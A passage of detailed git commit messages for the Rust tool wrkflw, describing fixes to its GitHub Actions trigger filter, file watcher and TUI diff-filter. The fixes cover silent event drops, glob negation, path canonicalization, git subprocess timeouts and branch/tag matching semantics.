reparsed when they actually change. If all of them fail to parse, say so — before, the user just saw "0 triggered, 0 skipped" and wondered what they'd broken. - Empty-tree SHA fallback is now a named constant and logs a warning when it's used. If you've fallen back to diffing against the empty tree, you almost certainly don't want to. - The 200-line Run arm in main.rs is extracted into run_trigger_prefilter_or_exit(). - Dead TriggerFilterError::IoError variant removed. Tests: 57 in trigger-filter (incl. PR base_branch semantics, invalid-glob parse errors, ref validation), 13 in watcher (incl. file-named-target cases), plus a regression test in the TUI for the path-keyed mapping. * fix(watcher,trigger-filter): stop dropping fs events and thrashing globs A fresh code review turned up a handful of real issues in the diff-aware execution path. A few of them were silent failure modes, which is the worst kind. The watcher had a 256-slot bounded MPSC with `try_send` sitting between the notify callback and the debouncer. The comment said dropping was fine "because the debouncer coalesces anyway" — which is only true for repeat events on the same path. Burst 300 distinct file changes at it and ~44 unique paths just vanish, and any workflow whose `paths:` filter matched exactly one of those files fails to trigger. Which is the entire point of the feature. Rip the channel out. The notify callback now pushes straight into the debouncer's shared set — a hashset insert under a mutex, bounded in cost, and it dedups for free. No intermediate buffer to overflow. It turns out `strip_prefix(&self.repo_root)` was also lying to us. On macOS, `/var` gets delivered as `/private/var`; symlinked worktrees have the same problem. Every event would fail the prefix check, the relative path list ended up empty, and the loop cheerfully `continue`d without telling anyone. Canonicalize the repo root once at startup and canonicalize incoming paths before stripping. Warn in verbose mode when events still don't resolve, so there's a breadcrumb when it does go wrong. While in there, the watcher was re-parsing every workflow's trigger config and recompiling every glob pattern on every cycle, because `filter_workflows` takes `WorkflowDefinition` and parses on the spot. Add `filter_trigger_configs` taking pre-parsed `WorkflowTriggerConfig`s, and have the watcher cache them by path, invalidated only when the backing file actually shows up in `changed_paths`. Free performance for anyone with more than three workflow files. And some smaller stuff the review turned up: `auto_detect_context` and friends were running three git subprocesses sequentially for absolutely no reason. `tokio::join!` them. `validate_ref_name` was rejecting `HEAD@{1}`, `@~1`, and `origin/main@{upstream}` — all perfectly legitimate git revision syntax — so extend the allowlist to include `@`, `{`, `}`. The TUI's diff-filter evaluator was hardcoding `event_name = "push"`; thread it through as a parameter so future event selection is a plumbing change, not a rewrite. And `run --diff` crashed with a confusing "Error parsing workflow" message when pointed at a directory — catch that up front and point the user at `wrkflw watch` instead. * fix(trigger-filter,watcher,ui): plug silent-failure holes and unblock reactor The review on this branch turned up a handful of "the filter quietly lies to you" bugs plus a watch loop that cheerfully calls blocking syscalls from inside an async function. Let's fix all of it. First, the actually scary one: inline `!`-prefixed patterns in `branches:`/`tags:`/`paths:` were compiled as literal globs. The `glob` crate doesn't treat a leading `!` as negation, so something like `branches: ['main', '!release/old']` would compile `!release/old` into a pattern that matches the string `!release/old` and nothing else. The exclusion got silently dropped and the workflow happily triggered on `release/old`. Route those into the `_ignore` lists at parse time, support the `!!literal` escape, and reject mixing inline `!` with a dedicated `-ignore` key (GHA itself rejects that). Four new tests cover it. Second silent lie: `get_default_diff_base` fell back to the empty-tree SHA when no better base could be detected, which made `git diff` list every tracked file as changed. The "filter" then matched everything — the log warning was the only hint. Make it return an error and let the CLI tell the user to pass `--diff-base` explicitly. A filter that can't tell you what it's filtering is worse than no filter. While at it, wrap every git subprocess in a 10s `tokio::time::timeout` so a hung git (network fs, credential prompt, corrupt repo) can't wedge the watch loop forever. And drop the redundant `git diff --cached HEAD` pass — plain `git diff HEAD` already covers staged + unstaged + deleted. It was doing nothing but spawning a second process. Third problem was the watch loop itself. `collect_workflow_files` ran `read_dir` synchronously inside the async run loop on every cycle, and the per-cycle canonicalize pass called `std::fs::canonicalize` on every changed path without ever hopping onto a blocking thread. On a branch switch touching thousands of files this stalls the reactor. Move both onto `spawn_blocking`. Also rewrote `should_ignore_path` to walk `rel.parent().components()` directly instead of collecting into a `Vec<Component>` — it runs on every notify event, so the allocation was genuinely wasteful. The doc comment on `run()` claimed the callback "will not stall the async watch loop" because it ran on `spawn_blocking`. That's misleading — the loop awaits the spawned task, so the next cycle doesn't start until the callback returns. Rewrote it to describe the actual behavior (events accumulate in the debouncer during the callback; keep it fast). While I was in the UI crate, the diff-filter toggle was spawning a raw OS thread and building a fresh `current_thread` tokio runtime on it — inside a TUI that's already running on a tokio runtime. This is the kind of thing that looks fine until you try to debug it. Use `tokio::task::spawn` on the ambient runtime and push the workflow-parsing loop onto `spawn_blocking`. Same amount of concurrency, none of the nested-runtime weirdness. Also: the TUI hardcodes `push` as the simulated event but never told the user. A workflow with `on: pull_request` would show up as SKIPPED and the user had no idea why. Surface it in the block title as `[DIFF: push]` and mention it in the toggle log. Extracted to a `const` on `App` so a future event selector is plumbing-only. Minor cleanups: consistent `Error:` prefixes in the CLI prefilter (was mixing "Warning: Failed" with `exit(1)` which is just confusing), and dropped the now-unused `wrkflw-logging` dep from `trigger-filter`. All workspace tests pass, clippy is clean. * fix(watcher,trigger-filter,ui): plug deleted-file + detached-HEAD holes and kill TUI foot-guns A principal-engineer review of this branch turned up a pile of correctness bugs and UX foot-guns that were all individually small but collectively embarrassing. Let's fix them. The nastiest one: when a file was deleted, `canonicalize` would fail on the missing target, the fallback was the raw path from notify, and on macOS (`/private/var` vs `/var`) or any symlinked working tree the subsequent `strip_prefix(repo_root)` would drop the event on the floor. So `rm src/main.rs` would silently fail to trigger any workflow with `paths: [src/*]`. Which — in a tool whose entire point is "run the workflows for what actually changed" — is not great. Fixed by walking back to the nearest canonicalizable ancestor and re-joining the missing tail. It's not pretty, but it's correct, and it keeps deletions on the happy path. While at it: - `should_ignore_path` used to iterate the absolute* path components when `strip_prefix` failed, which means a perfectly innocent `/home/alice/target-acquisition/file.rs` would match the `target` ignore entry. Now we just refuse to filter anything that isn't under the watch root. Please don't have directories named after cargo internals outside your repo, but if you do, we won't punish you for it. - `get_current_branch` was returning the literal string `"HEAD"` in detached-HEAD state, because that's what `git rev-parse --abbrev-ref HEAD` prints. Any workflow with `branches: [HEAD]` would then "match" in detached state. Signature is now `Result<Option<String>, _>`, callers `.ok().flatten()`. - Notify events are now filtered by kind. Access, metadata, Any, Other are dropped; only Create, Remove, Modify::Data, Modify::Name make it to the debouncer. A `git checkout` firing a thousand rename events would previously blow through MAX_SETTLE_ROUNDS mid-burst. It still might, but at least we're not also counting every atime update. - The run() callback is now fire-and-forget. Previously the watch loop awaited `spawn_blocking(cb).await`, so a slow reporter (file sink, Slack webhook, whatever comes next) would stall the next cycle. Documented as "keep it fast" is not a real defense. On the TUI side, the diff-filter key (`d`) had three separate problems. First, the event was a hardcoded `const DIFF_FILTER_EVENT = "push"`. Users whose main workflow is `pull_request` would press `d`, see every single workflow reported as SKIPPED, and file a bug. It's now a field (`App::diff_filter_event`) so a future event selector is a data-flow change and not a public API churn. Second, rapid toggles leaked background tasks. Each press spawned a fresh git + parse-every-workflow task and just dropped the previous channel. Now we hold a `JoinHandle` and `abort()` the previous task before starting a new one. Third, when `auto_detect_context_default_base` errored (fresh repo, no default branch, whatever), the UI silently showed every workflow as None and the summary line said "0/N workflows would trigger" — with no indication that anything had failed. The background task now returns a `DiffFilterOutcome::{Success, Failure}` and the failure reason gets pushed into the TUI log. Also: - Status bar default hint lost `t trigger` when `d diff` was added. The `t` keybinding still worked, only discoverability was gone. Restored. - Workflows-tab title now reads the dynamic `diff_filter_event` field instead of the const. Structural cleanup that was overdue anyway: - Introduced `WatcherConfig` builder. `WorkflowWatcher::new` already had eight parameters and a `#[allow(clippy::too_many_arguments)]` — the next knob was going to push it past ten. The old positional constructor is kept as a legacy forwarder so the CLI call site doesn't have to change in the same commit. - Split `WorkflowWatcher::run` into `refresh_trigger_cache` and `canonicalize_changed_paths` helpers. The loop was 190 lines of five concerns inline and completely untestable without spinning up a real notify watcher. - New `wrkflw_trigger_filter::load_trigger_config(path)` helper consolidates read + parse + compile globs. The watcher, the TUI diff evaluator, and the `run` CLI prefilter now all go through the same function, so they fail identically on the same broken file instead of each printing its own flavor of error. - `parser::resolve_include_and_ignore` replaces 40 lines of near- identical copy-paste across `branches`/`tags`/`paths`. Having the same bug in three places is not my idea of redundancy. - `wrkflw run` prefilter now roots git operations at the repo root via `find_repo_root()`, matching what the watcher already does. Consistent behavior when invoked from a subdirectory. Tests: 12 new tests covering deleted-file canonicalization, event- kind filtering, detached HEAD, diff-base error path, and the failure-reporting path in the TUI. Tempfile-backed git tests for `get_changed_files`, `get_default_diff_base`, and `get_current_branch`. Regression test for the absolute-path leak in `should_ignore_path`. 104 tests total across the three crates, all green, clippy clean. * fix(watcher,trigger-filter,ui,wrkflw): plug stale cache, silent parse failures, and reactor stalls - watcher: refresh_trigger_cache compared raw notify paths (absolute, OS-canonicalized) against read_dir paths (relative), so the "this workflow file was edited, reparse it" branch was dead code and watch mode served stale parsed configs forever after the first edit. Canonicalize both sides into the same form before set membership. - watcher: refresh_trigger_cache ran sync file I/O on the reactor. Move it onto a spawn_blocking thread via a new async wrapper; keep the sync helper as a free function so unit tests don't need a runtime. - ui: evaluate_diff_filter dropped parse failures via .filter_map(.. .ok()), leaving users with N workflows showing as "-" and no signal that their YAML was broken. Capture failures into a new DiffFilterReport and surface each one in the log pane. - ui: evaluate_diff_filter ran git helpers with cwd: None, so the TUI evaluated against whatever directory the user happened to be in rather than the discovered repo root. Plumb find_repo_root() through. - trigger-filter: validate_ref_name accepted '..', git's range syntax, which slipped through into format!("{base}..{head}") interpolation and produced confusing three-dot errors. Reject it explicitly. - trigger-filter: move find_repo_root from watcher into trigger-filter (the right home for our git shell-outs); watcher re-exports it for source compat. - wrkflw,watcher: migrate the CLI off the legacy WorkflowWatcher::new positional ctor to the WatcherConfig builder, then delete the legacy ctor and the unused filter_workflows API. * fix(trigger-filter,watcher,wrkflw): plug git zombie + watcher panic + silent filter holes PR review on the diff-aware/watch branch turned up six issues that either silently lie to the user or quietly degrade the watch loop over time. None of them blow up immediately, which is precisely why they're worth fixing before this lands. It turns out the 10s `tokio::time::timeout` around every git subprocess does nothing for the failure mode it was built for. A hung child (NFS stall, credential prompt, corrupt repo) keeps running after the timeout fires because `tokio::process::Command` does not enable `kill_on_drop` by default — the future just gets dropped and the zombie keeps consuming a process slot. On a long- running watch session against a flaky mount that's exactly how you end up with hundreds of zombie `git` processes. `kill_on_drop(true)` on `git_cmd`. One line. Should have been there from the start. The parser was happy to accept `paths:` + `paths-ignore:` (and the branches/tags equivalents) on the same event. GitHub Actions rejects that combination at upload time, so users could iterate locally against semantics that would later fail in production. Same crate, `extract_string_list` was silently dropping non-string list entries via `filter_map(... .as_str())` — a typo like `paths: [{src: foo}]` yielded an empty list, which then matched everything. The exact "silently lying about which workflows would run" failure mode the rest of this branch is built to prevent. Both now surface as `ParseError` with the offending `event.key[idx]` location. `auto_detect_context` collapsed a real `git rev-parse` failure to `branch: None` via `.ok().flatten()`, which made a permission denied on `.git/HEAD` look identical to a clean detached checkout. The detached-HEAD path already returns `Ok(None)` from `get_current_branch`, so the fix is just to drop the `.ok().flatten()` and let `?` propagate real errors. The watcher had two ways to silently brick itself. First, when `context_from_changed_files` errored, it fell back to a context with `branch: None` and kept going — every `branches:`-filtered workflow then deterministically rejected for the rest of the session while the user just saw "0 triggered" forever. Now the cycle short- circuits, attaches the reason to a new `WatchEvent::error` field, and the CLI surfaces it. Second, a panic from the executor would unwind through `buffer_unordered` and kill the entire watch loop — one rogue workflow takes down the session for everything. I wanted to use \`tokio::spawn\` for isolation, but the executor's \`dyn ContainerRuntime\` is not \`Sync\` so the future is not \`Send\`. \`AssertUnwindSafe(...).catch_unwind()\` from \`futures\` works on the local future, doesn't require \`Send\`, and gives us the same "contain it, log it, keep going" behavior. While at it: cache the canonical workflow path inside each trigger cache entry so refresh stops re-canonicalizing every workflow on every cycle (one \`lstat\` walk per file per cycle adds up on a network mount); drop the no-op \`WorkflowWatcher\` accessor methods that were pretending to be source-compat shims on a brand-new file; and split the 130-line, 8-arg \`run_trigger_prefilter_or_exit\` in main.rs into a \`PrefilterRequest\` struct + two helpers so the \`#[allow(clippy::too_many_arguments)]\` can go away. Tests cover all of it: parser combo-rejection (paths/branches/tags), non-string entry rejection in both \`paths:\` and \`types:\`, the null- is-empty negative case, canonical-path memoization across two refresh cycles, and a structural test that \`AssertUnwindSafe.catch_unwind\` actually classifies a panicking future as \`Err\` so the watcher's match arm fires. Existing \`parse_mapping_with_tags\` rewritten to use inline \`!\`-negation because the old shape now violates the rule it asserts against. \`cargo test --workspace\`: zero failures. clippy + fmt clean. * fix(trigger-filter,watcher,ui): kill silent failures and dead code found in review A principal-engineer-style review of the diff-aware-execution branch turned up a small pile of paper cuts. None of them are catastrophic on their own, but together they're the kind of "everything looks fine, why is nothing triggering?" failure mode this entire feature is supposed to prevent. The main offender lives in `extract_glob_list`. It carried a `compiled.source = display_src;` reassignment with a comment claiming it preserved the human-visible source for the `!!` escape — except `pattern_src` and `display_src` are equal in every branch, and `GlobPattern::new` already wrote `pattern_src` into `compiled.source` on the line above. So the assignment did nothing, and the comment lied about it. Collapse the two variables into one `pattern_str` and delete the dead write. While at it, document the greedy `!!` behavior properly and pin the `!!!foo` triple-bang case with a test, since GHA's spec doesn't cover it and we will refactor this function again someday. The TUI's `toggle_diff_filter` was calling `find_repo_root()` synchronously on the UI thread. That's a `git rev-parse --show-toplevel` subprocess. Microseconds on local disk, an actual hitch on a network mount, every single toggle. Move it into `spawn_blocking` inside the spawned task where it belongs. `evaluate_and_execute` was also doing two pointless `git` subprocess calls per cycle when there were zero parseable workflows. Short-circuit on `configs.is_empty()` and stop paying for context we'll never use. While I was in there: - `canonicalize_changed_paths` used to `filter_map(... .ok())` away any path it couldn't strip-prefix to the repo root. Notify should never deliver one of those, but if it does, silently dropping the event is exactly the failure mode this feature exists to kill. Log the dropped path under `--verbose`. - `get_default_diff_base` only stripped the `origin/` prefix from `git symbolic-ref --short` output. If `--short` ever fails to apply (older git, weird vendor, who knows), the output is `refs/remotes/origin/main` and the candidate name ends up wrong. Strip both forms. - `get_changed_files`'s doc claimed "covers staged + unstaged + committed-on-branch." That's almost true, but the modify-then-stage-then-revert-in-WT edge case is genuinely invisible to `git diff <base>`. Don't promise things we can't deliver — the trigger filter is an approximation, not a full index audit. - `explain_filter_failure` now mentions an empty change set when a `paths:` filter rejects, so the user who passed `--event push` without `--diff` gets a directly actionable hint instead of a `paths: ["src/*"]` dump and a furrowed brow. - `WorkflowWatcher::run` is an unbounded `loop {}` with no cancellation path. The CLI fakes graceful shutdown by calling `process::exit(0)` from a Ctrl+C handler. That works for the CLI, but anyone embedding this in a daemon or test harness is going to be unhappy. Document the limitation loudly so the next person knows it's a known follow-up rather than an oversight. - The `JoinHandle::abort` in `toggle_diff_filter` doesn't actually cancel anything — abort only signals at await points, and the git futures inside the task may keep running. Soften the doc to "no longer observed" instead of overstating the guarantee. None of this is glamorous. The bias of this entire branch has been "fail loud, don't lie about what's running," and this just finishes the cleanup the review surfaced. Build clean, all 71 trigger-filter / 21 watcher / 19 ui tests pass, no clippy warnings. fix(trigger-filter,watcher,ui,wrkflw): kill five more silent-failure holes from review A principal-engineer review of the diff-aware/watch branch turned up five places where this PR was still doing the exact thing the rest of the branch was built to stop doing: failing quietly. Let's fix them. `merge_unique` in trigger-filter built a `seen` set from `into` and then never updated it inside the loop, so duplicates within `more` itself happily slipped through. The function name is a contract — it just wasn't being honored. Switch to `HashSet::insert`'s "was new" return so each entry costs one lookup, not two, and add the obvious regression test. The watcher's notify callback was the next offender: a stray `if let Ok(event) = res` swallowed every `notify::Error` — queue overflow, inotify watch budget exhaustion, kernel disconnects, the lot. The user gets a cheerful "watching..." banner while the loop is effectively dead. Log the errors as warnings instead. While at it, `canonicalize_changed_paths` was doing the same trick with `unwrap_or_default` on its `JoinError`, mirroring nothing the neighboring `refresh_trigger_cache_async` was doing. Made them consistent. The TUI diff filter had a more subtle one. `toggle_diff_filter` aborts the previous in-flight evaluation on rapid toggles by dropping the receiver, which makes the next `check_diff_filter_results` tick see `Disconnected` — and unconditionally log "Diff filter: evaluation failed". Telling the user their action failed when they caused the disconnect is not great. Add a `diff_filter_aborted` flag, arm it only when there was actually something to abort, and clear it when consumed. Genuine task panics still get logged loudly. And finally, `wrkflw run`'s prefilter was calling `load_trigger_config` directly from an async fn, despite the library's own docs saying "wrap in spawn_blocking or call from a blocking context." The watcher and TUI both already do the right thing here; the CLI was the odd one out. Drifting on this is exactly how the silent-failure holes accumulated in the first place, so move it onto the blocking pool. Tests added for each: merge_unique dedup-within-more, the abort-flag arming and consumption, and a "real disconnect still gets logged" companion. trigger-filter 73/73, watcher 21/21, ui 21/21, wrkflw 3/3, clippy clean. * fix(trigger-filter,watcher,ui,wrkflw): plug another round of silent-failure holes from review Another review pass on the diff-aware/watch feature, another batch of "this thing was lying to the user." Same theme as the previous five rounds, but the failure modes here are louder and harder to recover from once they bite, so they go in their own commit. The TUI's `diff_filter_aborted` flag was a footgun. It got armed when a toggle aborted an in-flight evaluation, but on the OFF path the next tick observed `rx is None`, returned early, and never cleared the flag. The next toggle ON spawned a fresh task with a fresh receiver — and inherited the stale flag. So if that fresh task genuinely failed, the resulting `Disconnected` was treated as a self-inflicted abort and silently swallowed. Exactly the failure mode this whole feature has been built to prevent. Clear the flag at the start of every new evaluation and pin it with a regression test that drives the full ON → OFF → tick → ON → fail sequence. The watcher's `is_relevant_event_kind` had a catch-all `Modify(_) => false` that dropped `Modify(Any)` events. It turns out kqueue (FreeBSD, some macOS configurations) and notify's `PollWatcher` fallback emit `Modify(Any)` for content changes when the underlying API can't distinguish data from metadata. So the watcher worked beautifully on Linux inotify and macOS FSEvents and was completely silent on the other backends. Make the match exhaustive on `ModifyKind` (no catch-all) so future enum additions surface as a compile error instead of getting routed to "drop", and treat `Modify(Any)` as relevant. The watcher's repo-root canonicalization fallback was the worst of the three. When `canonicalize` failed, the previous code logged a warning and continued with the raw path. On macOS that means every notify event arrives as `/private/var/...`, every `strip_prefix` against the non-canonical `/var/...` rejects, and the user sees "Watching..." forever with zero workflows ever firing. A watcher that looks alive but never matches a single event is the absolute worst possible failure mode for this feature. Make it fatal at startup. If you can't canonicalize the repo root, you don't get a watcher. While at it: stamp `--activity-type` through all three integration points so workflows with `pull_request: { types: [...] }` filters actually work in the TUI, the watcher, AND the CLI prefilter (previously only the CLI bothered, and even then only after the last round of fixes); make `--diff-base` optional on the run command so the smart auto-detect (origin/HEAD → main → master → HEAD~1) is actually reachable instead of being shadowed by a `default_value = "HEAD"` that silently restricted every `--diff` invocation to uncommitted-only changes; add an info log when `get_default_diff_base` falls back to HEAD because the working tree is dirty, since "I have WIP edits, why is `--diff` reporting nothing triggered?" was a guaranteed support question; extract `load_trigger_configs` into the trigger-filter crate so the TUI and watcher stop maintaining near-duplicate parse-and-partition loops; tighten the activity-type diagnostic to point at the actual CLI flag instead of a tautology ("requires one"); warn loudly when a workflow panics inside the watch loop's `catch_unwind` that the executor may have left containers, tempdirs, or child processes uncleaned, because a silent panic-recovery on a long-running watch session is how you end up with `docker ps -a` looking like a graveyard; and tune `MAX_SETTLE_ROUNDS` from 10 down to 3 so a sustained `cargo build` can't delay a debounce drain by 5s while the user wonders if the watcher hung. Tests cover all three high-priority bugs explicitly. The aborted-flag test in particular drives the exact sequence the old code got wrong, because the only thing more embarrassing than a silent-failure hole in a "no more silent failures" feature is shipping the same failure mode again three weeks later. * fix(trigger-filter,watcher): plug three silent-failure holes Review pass turned up three more places where the trigger filter and watcher would quietly do the wrong thing instead of telling the user what was going on. Let's fix that. First: `parse_events` for the `on: [push, pull_request]` sequence form was silently dropping non-string entries. A typo like `on: [push, {pull_request: {branches: [main]}}]` collapsed to `on: [push]` and the pull_request filter never applied. The rest of the parser has been rejecting this kind of nonsense via `extract_string_list` for a while — the sequence path just never got the memo. Now it errors with the offending index and kind, same as everywhere else. Second: `explain_filter_failure` was building its branch-mismatch diagnostic from `filter.branches` only, completely ignoring `branches_ignore`. A workflow with ONLY `branches-ignore: [main]` running on `main` rendered as `branch 'main' did not match []` — factually correct, totally useless. Combine both lists with `!`-prefixed ignore entries so the diagnostic round-trips to the surface syntax the user actually wrote. Same treatment for tags, which had the identical bug. Third: the watcher's per-cycle `collect_workflow_files` rescan was swallowing errors with `if let Ok(refreshed) = ...` and silently reusing the previous snapshot forever. Not wrong — the watch loop must continue on transient failures — but silently falling back to a stale list with zero diagnostic is exactly the silent-skip pattern the rest of this PR has been plugging. Log at debug level so a `--verbose` run leaves a trail. Regression tests for all three. `cargo test` on the two touched crates: 101 passed, 0 failed. * fix(trigger-filter,watcher,wrkflw,ui): plug GHA divergence and CLI foot-guns from review It turns out the path matcher had a "helpful" fallback that tried the bare filename when a pattern had no slash in it. Neat trick, except it's not what GitHub Actions does. `.rs` would match `src/main.rs` locally and then silently fail to match the same file on GHA, which is the single worst outcome for a trigger filter whose entire job is predicting what the real runner will do. Rip it out. Users who want "any .rs file anywhere" write `/.rs` — that's the GHA idiom and always has been. Pin the new behavior with a test so nobody resurrects the fallback during a well-meaning refactor. While at it, a few CLI foot-guns the same review turned up. `find_repo_root()` shells out to `git rev-parse --show-toplevel` synchronously and is not covered by `GIT_COMMAND_TIMEOUT` — so a hung git (credential prompt, stuck NFS mount, corrupt repo) would cheerfully freeze the tokio reactor on `wrkflw run --diff` and `wrkflw watch`. The TUI already wrapped this call in `spawn_blocking`; the CLI just didn't. Fix both call sites. `wrkflw run --diff .gitlab-ci.yml` ran the GitHub-only trigger prefilter first and then dumped a confusing "Error parsing workflow" from deep in the YAML parser. Detect GitLab before the prefilter and bail out with a message that actually tells the user what went wrong. `max_concurrency` had a floor of 1 but no ceiling, so \`--max-concurrency 1000000\` was happily accepted. Each concurrent workflow carries executor state — containers, tempdirs, child processes — so unbounded values trivially OOM the host with no helpful signal. Clamp to 256 and warn loudly on the way down. The watch loop fire-and-forgets the reporter callback via \`spawn_blocking\` and then drops the JoinHandle. A panicking callback vanished into tokio's default panic reporter with zero watch-loop signal, which is exactly the silent-failure mode this whole PR has been plugging. Supervisor task now awaits the handle and logs any panic payload via \`wrkflw_logging::error\`. Not great that the reporter type still invites \`Fn(WatchEvent)\` directly, but at least a broken reporter is loud now. Also: the TUI diff-filter toggle used to pay for two git subprocess calls even when the workflow list was empty — mirror the watcher's \`configs.is_empty()\` short-circuit so an empty toggle is free. And dedup the branches/tags formatting in \`explain_filter_failure\` behind a \`combined_pattern_sources\` helper so a future diagnostic tweak can't make the two arms drift apart again. * fix(trigger-filter,watcher): stop git from stealing TTY and fix symlink ignore hole Another pass over the PR turned up two ugly ones plus a handful of smaller silent-failure holes that had been sitting there in plain sight. Let's deal with all of them at once. The headline issue: every git subprocess we spawn inherited stdin from the parent TTY and had no `GIT_TERMINAL_PROMPT=0`. In the TUI, which runs in raw-terminal mode, that means a backgrounded `git diff` from the diff-filter toggle will happily consume the user's keystrokes for the full `GIT_COMMAND_TIMEOUT` window (up to 10 seconds) while ratatui sits there wondering where its input went. On any repo whose remote wants auth it's even worse — git's askpass races the UI for every keypress. This is not great. Wire `Stdio::null()` and `GIT_TERMINAL_PROMPT=0` into `git_cmd` so every subprocess is fully insulated from the parent terminal, and do the same in `find_repo_root` while we're in there. The other ugly one: `should_ignore_path` compared events against `repo_root_canonical` only. That happens to work on macOS because FSEvents canonicalizes everything, but on Linux with a symlinked working tree (`/home/alice/proj` pointing at `/mnt/work/proj`), inotify delivers events rooted at the raw `.watch()` argument, so `strip_prefix` against the canonical form fails for every single event and the entire ignore filter goes silently dark. You end up eating every `target/`, `node_modules/` and `.git/` write through the debouncer. Pass both the raw and canonical forms and try each in turn — the two regression tests pin both the Linux-symlink and the macOS `/private/var` paths. While at it: - `find_repo_root` had no timeout at all. A hung git there leaks a blocking-pool thread for the rest of the process's life. Replaced with a hand-rolled `try_wait` poll + kill-on-deadline so we don't need tokio in this sync path. - `get_default_diff_base` trusted `git status` stdout without checking `status.success()`. On a corrupted repo it would cheerfully claim a clean tree and fall through. Check the exit code like every other call site does. - `parse_event_config` silently accepted non-mapping event values, so \`on: { push: "main" }\` collapsed to "push with no filters" instead of surfacing the typo. The one remaining silent-drop hole in a parser that's otherwise militant about these — fixed, with a regression test. - `with_max_concurrency(0)` silently clamped to 1 without the warning its upper-bound sibling emits. Symmetric now. - Dropped a stale doc comment on `GlobPattern` that still advertised the bare-filename fallback `path_matcher` explicitly deleted. All 79 trigger-filter tests and all 25 watcher tests pass, including the four new regressions (two symlink cases, the parser typo, and the ignore-file raw/canonical asymmetry). * fix(trigger-filter,watcher,wrkflw): plug scalability and platform holes from review Review flagged three issues that would bite real users the moment this ships: inotify budget exhaustion on monorepos, a per-cycle git subprocess storm, and Windows `paths:` filters silently never matching. Plus a handful of smaller cuts. inotify pruning. `watcher.watch(root, Recursive)` expands into one inotify watch per directory in the tree, so the recursive-on-root call was happily registering watches on every directory inside `target/`, `node_modules/`, and `.git/`. On any serious Rust monorepo that blows past `fs.inotify.max_user_watches = 8192` before the user edits a single file, at which point notify fails half-open and the watcher looks alive but never fires. New `setup_watches()` walks the root, registers each non-ignored child subtree recursively, and leaves the high-churn subtrees completely un-watched. The ignore filter on the event hot path stays too, because macOS FSEvents can still deliver paths the walker didn't register. Branch/tag cache. Every debounced cycle was shelling out to `git rev-parse --abbrev-ref HEAD` and `git describe --exact-match HEAD` — for information that changes on `git checkout` and `git tag`, i.e. basically never. A 40-file save storm was 80 git spawns for no reason. New `cached_git_state()` on `WorkflowWatcher` with a 3-second TTL. Not cache-invalidation-on-`.git/HEAD`-event because that would require whitelisting `.git/` back past the ignore filter and the TTL does the same job with a quarter of the complexity. Windows path separators. `canonicalize_changed_paths` handed backslash-separated strings straight to `path_matcher`, and `glob::Pattern` with `require_literal_separator: true` expects `/`. So `paths: ['src/*']` silently didn't match `src\main.rs` and every Windows user would have seen "0 triggered" with no explanation. New `normalize_separators()` helper runs after `strip_prefix`. While at it: `WatcherConfig::with_extra_ignore_dirs()` so users can add `.terraform`, `coverage`, `.next`, `bazel-bin`, etc. without waiting for us to land each one as a default. `display_workflow_path()` renders TRIGGERED/SKIPPED labels as repo-relative instead of the noisy absolute form. `find_repo_root_detailed()` returns a classified error (`GitNotInstalled` / `Timeout` / `NotInRepository` / `Other`) so `wrkflw watch` stops telling users "not inside a git repository" when the real problem was that git wasn't on PATH or the subprocess hung — that misdiagnosis was sending people down the wrong fix path every time. Doc comment on `get_changed_files` spelling out the rename-as-delete+add behavior since `paths-ignore` users will eventually trip over it. And a pin test for `workflow_dispatch`/`schedule`/`repository_dispatch` so a future refactor that starts defaulting `branches:` can't silently break manual triggers. Cancellation token and parallel parse are still deferred — both are larger surface changes and the review called them out as known follow-ups. Let's not bundle them here. fix(trigger-filter,watcher,ui,wrkflw): fix branches+tags OR, kill silent skips from review The big one first: a push workflow with BOTH `branches:` and `tags:` set was being evaluated as AND. So if you had on: push: branches: [main] tags: ['v'] the filter would never match anything. Branch push? tags axis is empty (no tag on HEAD), reject. Tag push? branches axis is empty (detached HEAD, no branch), reject. Elegant symmetry. Completely wrong. It turns out GitHub Actions treats that case as OR — the workflow fires if the branch matches `branches:` OR the tag matches `tags:`. Which is the only thing that makes sense, because a push is on a branch or* a tag, never both simultaneously. The previous sequential-AND check was literally unsatisfiable for the combo case and no test covered it, so we shipped a feature that silently skipped an entire class of real-world workflows. Extract `ref_filters_pass` that handles all four combinations explicitly and pin it with four regression tests covering branch push, tag push, miss, and `tags-ignore` exclusion. Update `explain_filter_failure` to render "neither ref axis matched" for the combo case so the diagnostic actually mentions both axes instead of just one. While at it, plug the rest of the review punch list. Retire the `find_repo_root` Option wrapper and migrate every call site (CLI run prefilter, CLI watch, TUI diff-filter) to `find_repo_root_detailed`. The wrapper collapsed git-not-installed, timeout, and not-in-repo into one Option::None, which sent users down the wrong fix path for three of the four failure modes. The TUI now surfaces the classified error via `DiffFilterOutcome:: Failure` instead of silently showing "0/N would trigger". Gate the "diff base = HEAD on dirty tree" info log on a `verbose` parameter threaded through `get_default_diff_base` and `auto_detect_context_default_base`. The CLI opts in via its `--verbose` flag; the TUI passes `false` so a hot-path toggle doesn't flood the log pane on every invocation. This was a papercut, not a bug, but it was loud. Move `process::exit` out of `build_event_context` and its helpers. The function now returns `Result<EventContext, String>` and the orchestrator owns the exit policy. Helpers that call `exit` from deep inside are untestable without spawning subprocesses, and we were accumulating them for no good reason. Canonicalize `WatcherConfig::workflow_dir` once in `from_config` so the trigger cache's `HashMap<PathBuf, _>` keys are stable when the user passes a relative or symlinked workflow directory. Not a bug in the current CLI (which always passes an absolute path), but the foot-gun was there for embedders and it was cheap to remove. Introduce `ShutdownSignal` — a lightweight cancellation handle backed by `tokio::sync::watch::channel::<bool>`. `WorkflowWatcher:: run` now takes one as a parameter and observes it via `tokio::select!` inside the idle wait, so triggering cancellation wakes the loop immediately instead of parking until the next fs event. The CLI passes `ShutdownSignal::never()` because it still relies on `process::exit` from Ctrl+C; long-lived hosts (TUI, future daemon, tests) construct a real signal. The first implementation of `ShutdownSignal` used `tokio::sync:: Notify` and had a nasty trigger-before-wait race: `notify_waiters()` only wakes currently-parked tasks, so a caller that triggered shutdown and then spawned a task that called `wait()` would park forever. The watch-channel version stores the latest value, so a subscriber that joins after trigger sees the fired state on the very next `wait_for` poll. Pinned by `wait_after_trigger_sees_triggered_state_immediately` so a future refactor can't silently reintroduce it. Split the 1884-line `watcher.rs` into five focused submodules with their own tests: `ignore` (default ignore set + path filter), `paths` (canonicalization + separator normalization + display_workflow_path), `event_kind` (notify event classification), `trigger_cache` (per-cycle parsing cache), and `setup` (subtree-by-subtree watch registration). Everything is `pub(crate)` so the public surface is exactly what `lib.rs` re-exports. Nothing clever, just stop pretending one file is a reasonable home for 1200 lines of hot-path logic. Add an end-to-end watcher pipeline test (`end_to_end_pipeline_delivers_watch_event`) that spins up a 